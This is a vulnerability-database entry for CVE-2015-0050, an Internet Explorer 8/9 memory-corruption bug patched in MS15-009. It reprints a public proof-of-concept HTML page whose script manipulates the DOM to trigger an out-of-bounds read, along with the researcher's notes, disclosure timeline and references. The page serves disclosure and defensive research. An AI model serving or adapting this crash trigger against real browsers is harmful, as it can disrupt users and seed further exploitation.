CVE-2015-0050
Description
Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-8967 and CVE-2015-0044.
Mitigations
No mitigations published for this CVE yet.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Microsoft Internet Explorer 8 - MSHTML 'SRunPointer::SpanQualifier/RunType' Out-Of-Bounds Read (MS15-009)
```html
<!--
Source: http://blog.skylined.nl/20161122001.html

Synopsis
A specially crafted web-page can cause Microsoft Internet Explorer 8 to attempt to read data beyond the boundaries of a memory allocation. The issue does not appear to be easily exploitable.

Known affected software, attack vectors and mitigations
Microsoft Internet Explorer 8
An attacker would need to get a target user to open a specially crafted web-page. Disabling JavaScript should prevent an attacker from triggering the vulnerable code path.

Repro.html:
-->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
  <head>
    <meta http-equiv="X-UA-Compatible" content="IE=Edge" />
    <style>
      /* Type selectors for the custom tag names created by the script below. */
      position_fixed { position: fixed; }
      position_relative { position: relative; }
      float_left { float: left; }
      complex { float: left; width: 100%; }
      complex:first-line { clear: left; }
    </style>
    <script>
      window.onload = function boom() {
        // Custom elements picked up by the type selectors in the style sheet.
        oElement_float_left = document.createElement('float_left');
        oElement_complex = document.createElement('complex');
        oElement_position_fixed = document.createElement('position_fixed');
        oElement_position_relative = document.createElement('position_relative');
        oElement_table = document.createElement('table');
        oElement_x = document.createElement('x');
        oTextNode = document.createTextNode('x');
        // Build the DOM tree: float_left > (complex > fixed, relative, table, x), text.
        document.documentElement.appendChild(oElement_float_left);
        oElement_float_left.appendChild(oElement_complex);
        oElement_float_left.appendChild(oTextNode);
        oElement_complex.appendChild(oElement_position_fixed);
        oElement_complex.appendChild(oElement_position_relative);
        oElement_complex.appendChild(oElement_table);
        oElement_complex.appendChild(oElement_x);
        setTimeout(function() {
          // Attribute change forces a restyle/relayout of the tree built above.
          oElement_x.setAttribute('class', 'x');
          setTimeout(function() {
            alert();
            document.write(0);
          }, 0);
        }, 0);
      }
    </script>
  </head>
</html>
<!--
Description
The issue requires rather complex manipulation of the DOM and results in reading a value immediately following an object. The lower three bits of this value are returned by the function doing the reading, resulting in a return value in the range 0-7. After exhaustively skipping over the read AV and having that function return each value, no other side effects were noticed. For that reason I assume this issue is hard if not impossible to exploit and did not investigate further. It is still possible that there may be subtle effects that I did not notice that allow exploitation in some form or other.

Time-line
June 2014: This vulnerability was found through fuzzing.
October 2014: This vulnerability was submitted to ZDI.
October 2014: This vulnerability was rejected by ZDI.
November 2014: This vulnerability was reported to MSRC.
February 2015: This vulnerability was addressed by Microsoft in MS15-009.
November 2016: Details of this issue are released.
-->
```
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| microsoft | internet_explorer | 8 | |
| microsoft | internet_explorer | 9 | |
References
- http://blog.skylined.nl/20161122001.html
- http://seclists.org/fulldisclosure/2016/Nov/135
- http://www.securityfocus.com/archive/1/539808/100/0/threaded
- http://www.securityfocus.com/bid/72419
- http://www.securitytracker.com/id/1031723
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2015/ms15-009
- https://www.exploit-db.com/exploits/40841/
CWEs
CWE-399